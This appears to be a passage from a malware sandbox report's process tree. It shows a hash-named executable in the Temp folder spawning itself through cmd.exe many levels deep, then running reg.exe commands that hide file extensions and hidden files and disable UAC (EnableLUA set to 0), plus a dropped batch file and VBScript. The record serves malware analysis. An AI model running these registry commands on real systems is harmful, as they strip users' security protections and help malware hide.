C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
89⤵
PID:4820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
90⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
91⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
92⤵
PID:2940

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
93⤵
PID:1836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
94⤵
PID:1920

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
95⤵
PID:5068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
96⤵
PID:1872

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
97⤵
PID:3028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
98⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
99⤵
PID:2056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
100⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
101⤵
PID:3516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
102⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
103⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
104⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
105⤵
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
106⤵
PID:1652

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
107⤵
PID:2040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
108⤵
PID:732

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
109⤵
PID:2120

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
109⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
110⤵
PID:388

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
111⤵
PID:2600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
112⤵
PID:1220

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
113⤵
PID:2576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
114⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
115⤵
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
116⤵
PID:2120

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
117⤵
PID:4440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
118⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
119⤵
PID:5088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
120⤵
PID:4680

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
121⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
121⤵
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
122⤵
PID:3064

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
123⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
124⤵
PID:1428

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
125⤵
PID:4560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
126⤵
PID:4852

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
127⤵
PID:2228

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
127⤵
PID:2488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
128⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
129⤵
PID:2340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
130⤵
PID:2356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
131⤵
PID:2612

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
131⤵
PID:3084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
132⤵
PID:1800

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
133⤵
PID:4652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
134⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
135⤵
PID:348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
136⤵
PID:4400

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
137⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
137⤵
PID:3204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
138⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
139⤵
PID:3264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
140⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
141⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
142⤵
PID:3240

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
143⤵
PID:2904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
144⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
145⤵
PID:2576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
146⤵
PID:448

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
147⤵
PID:408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
148⤵
PID:5116

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
149⤵
PID:744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
150⤵
PID:3100

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
151⤵
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
152⤵
PID:4776

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
153⤵
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
154⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
155⤵
PID:2488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
156⤵
PID:3112

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
157⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
158⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
159⤵
PID:3028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
160⤵
PID:732

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
161⤵
PID:3432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
162⤵
PID:1848

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
163⤵
PID:4856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
164⤵
PID:4452

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
165⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
166⤵
PID:4128

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
167⤵
PID:1872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
168⤵
PID:3076

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
169⤵
PID:436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
170⤵
PID:1028

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
171⤵
PID:3404

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
171⤵
PID:2404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
172⤵
PID:1208

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
173⤵
PID:1644

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
173⤵
PID:5096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
174⤵
PID:4288

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
175⤵
PID:752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
176⤵
PID:4316

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
177⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
177⤵
PID:2168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
178⤵
PID:2544

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
179⤵
PID:3756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
180⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
181⤵
PID:3716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
182⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
183⤵
PID:3104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
184⤵
PID:2760

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
185⤵
PID:2056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
186⤵
PID:5048

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
187⤵
PID:4672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
188⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
189⤵
PID:2632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
190⤵
PID:3080

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
191⤵
PID:1028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
192⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
193⤵
PID:4332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
194⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
195⤵
PID:3400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
196⤵
PID:2168

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
197⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
197⤵
PID:900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
198⤵
PID:3624

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
199⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
200⤵
PID:2540

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
201⤵
PID:3100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
202⤵
PID:2544

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
203⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
204⤵
PID:2136

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
205⤵
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
206⤵
PID:3556

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
207⤵
PID:4316

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
207⤵
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
208⤵
PID:3856

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
209⤵
PID:388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
210⤵
PID:368

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
211⤵
PID:3696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
212⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
213⤵
PID:1392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
214⤵
PID:2824

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
215⤵
PID:3360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
216⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
217⤵
PID:5056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
218⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
219⤵
PID:4524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
220⤵
PID:3404

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
221⤵
PID:1708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
222⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
223⤵
PID:4920

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
224⤵
- Modifies visibility of file extensions in Explorer
PID:2488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
225⤵
PID:2492

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
224⤵
PID:3752

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
224⤵
- UAC bypass
PID:1816

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
222⤵
PID:4852

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
223⤵
PID:2200

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
222⤵
PID:2572

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
222⤵
- Modifies registry key
PID:2648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qIoUccgY.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
222⤵
PID:4988

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
223⤵
PID:4820

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
220⤵
- Modifies visibility of file extensions in Explorer
PID:3516

